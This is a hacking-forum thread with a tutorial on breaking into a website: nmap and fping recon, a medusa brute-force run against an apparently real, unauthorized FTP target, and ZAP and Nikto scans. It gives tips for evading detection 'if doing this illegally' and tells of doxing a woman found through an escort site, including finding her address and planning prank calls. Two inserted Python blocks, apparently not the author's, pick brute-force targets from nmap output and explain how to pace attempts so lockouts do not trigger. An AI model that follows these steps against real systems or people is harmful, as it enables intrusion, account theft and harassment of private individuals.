Thread Contributor: Cylar
[TUT] Hacking an unhackable Website. Professional Style
#1
Hacking Websites


[Image: logo-9-557aa147v1_site_icon.png]



Hello guys, this is going to be a guide on how to scan and hack a website.

I'm using Ubuntu, but you can use whatever Linux distro you want.
Before we start, you are going to need a few tools to get you started.
Also, let me tell you what this tutorial is going to be about.
In this guide I will show you a massive but effective way of hacking an unhackable website,
going through not all, but the best possible ways to get a result.
Okay, so what usually happens when you scan a website, or what people tell me, is "oh, I can't hack it",
or "I cannot find a website vulnerability". "Boo hoo". Well, look no further, as I will go through a lot of good ways
right here.




So who am I?
Just a regular guy, like you, who had a huge passion for computers at a young age.
I taught myself programming and learnt as much as I could about computers. Also, I'll make it quick on
how to become a hacker. Basically, hacking is about learning how things work. ???
WHAT!!!! Yes. That's it. Hacking isn't just about hacking computers. It happens in everyday life.
Here is an example. A cigarette lighter: the flame only goes 1 inch in height, for example,
and people don't know, or think it can't go any higher than it is set at. Why?
Because they don't understand its inner workings or how it was built.



Here is my example.
Lighter hack



So by understanding how it works, we can use it differently from how it was meant to be used.
Another example is the phone phreaker. He found out how to hack it by understanding how it was built.
He knew the phone operated by a noise going through the operator. A tone said "give access to call" and the operator put the call through. So then he invented the blue box hack.

So there are my examples for you to learn from. So if we look at how websites are made?
Code, plain and simple. So by learning about code we can learn how to attack a website, for example
XSS, SQL, RFI, LFI, CRLF, and so on. So learn from this information and you will become an amazing hacker.
This is the way you need to be thinking: not only can you hack websites and computers, but you can hack TVs, cars, anything is hackable.




  • zaproxy
  • nmap
  • nikto
  • fping
  • oping
  • theharvester
  • hydra/medusa




*NOTE: you can install all of these in Linux by typing: sudo apt-get install nikto nmap fping oping
and downloading Zaproxy from GitHub; I'll post that tut at the bottom.



Okay, so the first step we need to do is find some information about the
targeted website, so we begin by using ping. Yes, ultra skills, right? Ignore me. But I'm dead serious.
Okay, so first we use:



ping <website>

*We acquire the website IP*

fping -b 50 -c 52 -H 40  <IPAddress>




*Leave it running and press CTRL+C when finished to see the result. Check packet loss; see if it's functioning okay.

> sudo nmap -sSV -O <IPAddress> --packet-trace




*Packet trace isn't necessary; I just like to use it to see the packets.
Acquire port numbers. The ones we are looking for are ports 21, 19, 23, 80.

If you're feeling brave you can use the -T4 option. I wouldn't recommend it if you are
doing this illegally; in fact I would set up proxychains and run using that.
It might take longer, yes, but less risk. Also, spoofing your MAC using macchanger is always good.

* Using the -O option we can take a guess at the operating system. Here are my results.


Code:
Device type: general purpose|storage-misc|firewall
Running (JUST GUESSING): Linux 2.6.X|3.X (90%), Synology DiskStation Manager 5.X (89%), WatchGuard Fireware 11.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8
Aggressive OS guesses: Linux 2.6.32 (90%), Linux 3.4 (89%), Synology DiskStation Manager 5.1 (89%), Linux 3.10 (88%), Linux 2.6.32 or 3.10 (88%), Linux 2.6.39 (88%), WatchGuard Fireware 11.8 (88%), Linux 3.1 - 3.2 (88%), Linux 2.6.32 - 2.6.39 (86%), Linux 3.5 (85%)
No exact OS matches for host (test conditions non-ideal).


They are not 100% accurate. Okay, so my port results show the following:

Code:
21/tcp    open   ftp      Pure-FTPd
22/tcp    open   ssh      OpenSSH 5.3 (protocol 2.0)
80/tcp    open   http     Apache httpd
443/tcp   open   ssl/http Apache httpd

Okay, so we can see what services are available to us. Great. What I like to do is go for the FTP service straight up.

Now what you can do is set up crunch and create your own password list,
or you may download one from the internet. I always run a default password list,
just in case. Also note the OpenSSH 5.3 (protocol 2.0). Always copy and paste this into Google
and look at exploit-db; see if anyone has developed an exploit for it.
The same goes for FTPd, and any other software versions you notice.

Okay, so let's get to it.

If we Google Pure-FTPd with exploit-db we find:

Sexy, right?

If we ran that, we could exploit it and gain access, and then it's GG, game over. Okay, BUT! I don't have msfconsole set up
on my Ubuntu; maybe if I do it later
I'll exploit it with this method. Sorry guys, it's a real pain in the ass to set up.
But if you don't know how to add a Ruby script to msf, just Google it. And if you do, then hat's off to you, sir.

Medusa/Hydra

Okay, now we have our two services: FTP and SSH.
Let's try and hack these, shall we?

Now it's completely your preference which tool you wish to use.
I personally like using Hydra more, but for this method I'll be using Medusa.

*NOTE: Most tutorials using brute-force methods don't tell you about GPU usage.
Okay, so if you have a decent GPU then you're fine, and if you have enough bandwidth along with that, then
you are also fine; if not, you will have to use threads and slow it right down.
Also note that it is better using threads even with a decent GPU and bandwidth, because the service will block the incoming requests. It's like constantly retrying a password and then a forum says "sorry, try again in a few minutes".

This sometimes, and a lot of the time, crashes the tool, and most people will panic and think the tool isn't working.
This is why it's good to learn programming for hacking, so you know and understand what is going on.
In fact, if you go full out and thread to the maximum, you can actually end up DoSing yourself.
So take it slow; remember it's brute force, it takes a very long time. This brings me onto my next point, which is that
I always go for option two,
which will be website scanning, but we will get into that later on.
Okay, so Medusa, here we come.

Medusa is a great password cracking tool. I'm using this, one, because most people do not know how to use Hydra properly, and Medusa, well, is a lot easier. Okay, so let's get started.



*NOTE: Always note down information in a notepad (Leafpad):
IP address, ports, information, vulns. The more information in that notepad, the better.
Okay, so we have our IP address and ports. Let's get started. First, if you haven't already, download a word list.

I'll link you a default wordlist, which I'll be using in this guide.

Some really great username/password lists.
*NOTE: Don't open it in the browser, it will probably crash; use wget instead.
Use the command wget <Address> and save it.

Okay, so to run the brute force, make sure your username/password list is in the directory you're attacking from.


sudo medusa -M ftp -f -e ns -r 5 -v 2  -h 00.00.00.000 -u admin -P 10k_most_common.txt


Where the 0s are, put your target IP address; I blocked it out for reasons.



Code:
Medusa v2.2_rc3 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

ERROR: Thread B3FFF700: Host: 50.63.68.215 Cannot connect [unreachable], retrying (1 of 3 retries)
ERROR: Thread B3FFF700: Host: 50.63.68.215 Cannot connect [unreachable], retrying (2 of 3 retries)
ERROR: Thread B3FFF700: Host: 50.63.68.215 Cannot connect [unreachable], retrying (3 of 3 retries)
NOTICE: ftp.mod: failed to connect, port 21 was not open on 00.00.00.00




As you can see, I got blocked. This happens, but it's okay; just wait an hour or so and it might be back up.
I either got blocked because of the attack or it just happened to go down at that time.
I tried SSH but it went down as well, sorry about that. Okay, this is why it's important to have a plan B.
Okay, so our next step is website scanning. Open Zaproxy.

Okay, there are two methods to this. One is using the proxy, or two, using quick attack; personally I prefer the proxy.
So download the addon FoxyProxy and add a new proxy with localhost and port 8080.
This will be the Zaproxy port. So visit your target website, switch to the Zaproxy proxy you just made in
FoxyProxy, and refresh the page. Great, now go back to your Zaproxy.

Okay, right-click on the target website and click Spider.




[Image: OEh81pC.png]




Leave this running for about 10 - 20 minutes. Next, we need to start the active scan.

As soon as the scan starts, stop it. Now go to the policy button as shown:



[Image: CvPpuJe.png]



Now change all of these to High and either Hard or Insane. What this will do is: setting the first option to
High will reduce the false positives, and setting the other option higher will increase the number of attack tests.
Usually, if you're going for a quick scan, you can leave them all at their default setting, which is Medium.

For best results, now run the scan again and just wait; this could take an hour or more.
Now go to the results and look for the red flags, and check to see if there are any vulnerabilities.
If there are, that's great. Here are my results.


*NOTE: you can also open this and skip the tasks, say if you just wanted an SQL scan or XSS.


[Image: 3jk9UAB.png]






TheHarvester



Okay, now before we go and exploit these vulnerabilities, we are going to do a bit more recon.
TheHarvester is a great tool that can find emails through metadata. Finding emails on a website is also good if you're going to
do a dox; for example, if you used it on hackforums.scrub and found a huge list of emails, and started doxing some punks.
Well, I'm not going to make a tutorial on that, as I would be here all week. Okay, so emails are good for quite a lot of things.
You can use them against a company if you had contacts; you can also use emails to try and brute-force their accounts.
Or if you're trying to target a certain person on a website, then again, emails are your best bet.
If you wanted to, you could hack the website via SQL injection and just hack that person's account, without doing damage to
the website, that is, if you could get away with it. Another thing you could do with emails is recon again, and find out about that
person, i.e. family members, social media, general dox stuff; but with a lot of dox information it's possible to try and reset their account. Usually, if you have enough information on a Facebook account or Hotmail, you can do this; some services are harder,
or their security system is different.

Okay, so let's get to it. For my target I decided to go for an escort website, don't ask. But one reason is how poorly they are set up.
I know they hire mediocre web designers, and some even just steal software and put it all together for a few hundred pounds.



Run command:
python theHarvester.py -d website -b all -n -t -c



[Image: hYtNGsG.png]




Nice and easy. Like I said, it's easy when you know what to target. Now a quick Google search will tell me a lot.





[Image: BVZjkJI.png]




Yeah, so if I wanted to, I could gather a lot of information about this person
and turn it into a mass dox and just try and steal her emails and account information. I could even prank call if I wanted, get some pizzas going, you know, the general stuff. Oh, I even managed to find her address, which is nice to know how safe you can be on the internet.
I guess today's security is too strong for me. Right, so let's go check those results, shall we? Oh wait, what is this?




[Image: Ngv3jyC.png]






Damage is absolutely critical, holy sh*$. I haven't even finished the tutorial yet and already I have 3-5 methods of attack.
God damn, I love security.



Nikto

So for our final step we will be using Nikto. Just in case you didn't get any vulnerabilities, you can try Nikto.
I always use 5 different vulnerability scanners on each target, and I use a bunch of other methods, but this is just
to help you guys. Another thing: make sure you use an offshore VPN. You can also use proxychains while using the tool,
but it can make it crash/stop. I use the -no404 option so it doesn't look for 404s, but you can just scan it normally.

Command: sudo nikto -h <address> -no404



[Image: 0gf7wzM.png]





NOTE PLEASE IGNORE FOR NOW IM EDITING IT AS WE SPEAK!!!!!!!!!!!!!!!!


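The post's recon steps (ping, nmap -sSV -O, write the IP, ports and version banners into a notepad, then look each banner up on exploit-db and pick FTP/SSH for the brute-force stage) can be scripted against nmap's grepable output. The following is an added example for this thread, not Cylar's code and not part of the original post. The host line is constructed to mirror the services the post reports (Pure-FTPd, OpenSSH 5.3, Apache on 80/443); 198.51.100.10 is a documentation address, not a real target, and the extra filtered port 25 is there to show that non-open ports are kept out of the notes.

```python
"""Turn nmap grepable output (-oG) into the per-target recon notes the post
recommends keeping, plus the version banners worth looking up.

Get this format with:  nmap -sSV -O -oG scan.gnmap <target>
"""
from dataclasses import dataclass, field

# Constructed sample of one "Host:" line as nmap -sV -oG writes it. Each port
# entry is port/state/proto/owner/service/rpc/version/ and nmap writes a "/"
# inside a service name (ssl/http) as "|".
SAMPLE_GNMAP = (
    "Host: 198.51.100.10 ()\tPorts: "
    "21/open/tcp//ftp//Pure-FTPd/, "
    "22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd/, "
    "443/open/tcp//ssl|http//Apache httpd/, "
    "25/filtered/tcp//smtp///\tOS: Linux 2.6.32\n"
)

# Services the post goes after with medusa/hydra, mapped to the module name.
LOGIN_MODULES = {"ftp": "ftp", "ssh": "ssh"}


@dataclass
class Service:
    port: int
    state: str
    proto: str
    name: str
    version: str


@dataclass
class HostNotes:
    ip: str
    os_guess: str = ""
    services: list = field(default_factory=list)

    def open_services(self):
        return [s for s in self.services if s.state == "open"]

    def lookup_strings(self):
        """Exact version banners to paste into exploit-db or a search engine."""
        return sorted({s.version for s in self.open_services() if s.version})

    def login_targets(self):
        """medusa/hydra module name -> port, for the services worth brute-forcing."""
        return {LOGIN_MODULES[s.name]: s.port
                for s in self.open_services() if s.name in LOGIN_MODULES}

    def as_notes(self):
        """The notepad entry the post recommends keeping per target."""
        lines = [f"IP: {self.ip}", f"OS guess: {self.os_guess or 'unknown'}", "Ports:"]
        for s in self.open_services():
            lines.append(f"  {s.port}/{s.proto} {s.name} {s.version}".rstrip())
        lines.append("Look up: " + "; ".join(self.lookup_strings()))
        return "\n".join(lines)


def parse_gnmap(text):
    """Parse every 'Host:' line that carries a 'Ports:' field into HostNotes."""
    hosts = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # nmap also emits '# Nmap ...' comments and 'Status:' lines
        fields = dict(f.split(": ", 1) for f in line.split("\t"))
        notes = HostNotes(ip=fields["Host"].split()[0], os_guess=fields.get("OS", ""))
        for entry in fields["Ports"].split(","):
            parts = entry.strip().split("/")
            if len(parts) < 7:
                continue  # not a well-formed port entry
            notes.services.append(Service(
                port=int(parts[0]), state=parts[1], proto=parts[2],
                name=parts[4].replace("|", "/"), version=parts[6]))
        hosts.append(notes)
    return hosts


if __name__ == "__main__":
    for host in parse_gnmap(SAMPLE_GNMAP):
        print(host.as_notes())
        print("Brute-force candidates:", host.login_targets())
```

Feed it a real scan with `parse_gnmap(open("scan.gnmap").read())`; `lookup_strings()` gives you the exact banners to search, and `login_targets()` tells you which medusa `-M` module and port to use, which is the decision the post makes by eye from the nmap table.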
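The post's warning that the service "will block the incoming requests" if you thread the brute force too hard is easier to reason about from the target's side. The following is an added example for this thread, not Cylar's code and not part of the original post: it replays constructed sshd and Pure-FTPd log lines through a fail2ban-style sliding-window lockout and reports which source gets banned and when. The log lines, host name, timestamps and 203.0.113.x addresses are all invented; the threshold of 5 failures in 600 seconds is an assumed policy (fail2ban's defaults), not anything the post measured, and it makes no claim about why the author's target went unreachable.

```python
"""What the target sees while medusa/hydra runs: failed logins per source,
counted in a sliding window, with a ban once the count reaches the threshold."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed syslog-style lines. 203.0.113.7 hammers FTP and SSH in a burst;
# 203.0.113.9 spreads two failures over minutes and then logs in legitimately.
SAMPLE_LOG = """\
May  9 08:20:01 web sshd[2201]: Failed password for admin from 203.0.113.7 port 50123 ssh2
May  9 08:20:02 web sshd[2201]: Failed password for admin from 203.0.113.7 port 50124 ssh2
May  9 08:20:02 web pure-ftpd: (?@203.0.113.7) [WARNING] Authentication failed for user [admin]
May  9 08:20:03 web pure-ftpd: (?@203.0.113.7) [WARNING] Authentication failed for user [admin]
May  9 08:20:03 web sshd[2201]: Failed password for admin from 203.0.113.7 port 50125 ssh2
May  9 08:20:04 web sshd[2201]: Failed password for admin from 203.0.113.7 port 50126 ssh2
May  9 08:20:40 web sshd[2202]: Failed password for root from 203.0.113.9 port 41000 ssh2
May  9 08:25:10 web sshd[2203]: Failed password for root from 203.0.113.9 port 41001 ssh2
May  9 08:31:00 web sshd[2204]: Accepted password for deploy from 203.0.113.9 port 41002 ssh2
"""

# One pattern per service; both capture the source address and the user tried.
FAILURE_PATTERNS = [
    re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
               r"from (?P<ip>[\d.]+)"),
    re.compile(r"pure-ftpd: \(\S*?@(?P<ip>[\d.]+)\) \[WARNING\] "
               r"Authentication failed for user \[(?P<user>[^\]]+)\]"),
]


def parse_failure(line, year=2016):
    """Return (timestamp, ip, user) for a failed-login line, else None.
    syslog timestamps carry no year, so one is supplied (assumed 2016 here)."""
    for pat in FAILURE_PATTERNS:
        m = pat.search(line)
        if m:
            ts = datetime.strptime(f"{year} {line[:15]}", "%Y %b %d %H:%M:%S")
            return ts, m.group("ip"), m.group("user")
    return None


def failures_by_source(log_text):
    """Total failed logins per source address, across both services."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        hit = parse_failure(line)
        if hit is not None:
            counts[hit[1]] += 1
    return dict(counts)


def find_blocks(log_text, maxretry=5, findtime_s=600):
    """Replay the log; return {ip: ban_time} for every source whose failures
    reach maxretry inside any findtime_s-second window (fail2ban semantics)."""
    windows = defaultdict(deque)
    blocked = {}
    for line in log_text.splitlines():
        hit = parse_failure(line)
        if hit is None:
            continue
        ts, ip, _user = hit
        if ip in blocked:
            continue  # already banned; later attempts just fail to connect
        q = windows[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > findtime_s:
            q.popleft()  # drop failures that aged out of the window
        if len(q) >= maxretry:
            blocked[ip] = ts
    return blocked


if __name__ == "__main__":
    print("failures:", failures_by_source(SAMPLE_LOG))
    for ip, when in find_blocks(SAMPLE_LOG).items():
        print(f"{ip} banned at {when:%H:%M:%S}")
```

With the default policy the bursting source is banned on its fifth attempt, two seconds into the run, while the slow source never trips the window; shrinking `findtime_s` to 60 shows the same slow source surviving even a `maxretry` of 2, because its two failures are 270 seconds apart. That gap between attempts, not the size of the wordlist, is what decides whether a brute force like the post's medusa run stays connected.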
#2
Already very detailed. I'm curious how it will look when you're finished. Keep it up mate, I'm glad activity is rising.
Reply
#3
(09-05-2016, 08:23 AM)Bish0pQ Wrote: Already very detailed. I'm curious how it will look when you're finished. Keep it up mate, I'm glad activity is rising.

Thanks buddy. (y) I had to post it as my Leafpad was maxing out :rolleyes:
Still more information to be added; I don't know if it will all fit, haha.
Reply
#4
(09-05-2016, 08:33 AM)Cylar Wrote:
(09-05-2016, 08:23 AM)Bish0pQ Wrote: Already very detailed. I'm curious how it will look when you're finished. Keep it up mate, I'm glad activity is rising.

Thanks buddy. (y) I had to post it as my Leafpad was maxing out :rolleyes:
Still more information to be added; I don't know if it will all fit, haha.

Split it up into parts ;) It will give you and others a better overview. Looks great, BTW.
Reply
#5
Very nice, Cylar.

I like the way you delivered. You keep it intriguing, with some personality, and I was definitely engaged throughout. I got stuck and read it all, from top to bottom.

Though, I would suggest creating multiple threads on the different tools/methods; that way there's less to go through, things are organized, and you get more of a thread count ;)
which isn't really abusing policy, because there's enough information under each section here for you to post them as individual threads with decent info.

A brilliant contribution, thank you, and I look forward to seeing more from you.

Edit: I'm not sure if the poll is a joke they're pulling on you, or if I'm the one reading something wrong - but that's just disgusting... keep doing you.
Reply
#6
Nice In depth guide.

I've used all the tools mentioned, and they're proven to provide some pretty good results. On the topic of phone phreaking, Kevin Mitnick was renowned in that capacity (as well as being a master social engineer), who manipulated the telephone system and performed some really cool hacks, one of which was turning landlines into pay phones, whereby every time the given person made an outgoing call from his/her home phone, an automated voice would say "please deposit 25 cents...".

Nice contribution, thanks.
Reply
#7
What a fantastic thread, not going to lie this has made me want to get Linux so badly! Great tutorial, really impressed!
Reply

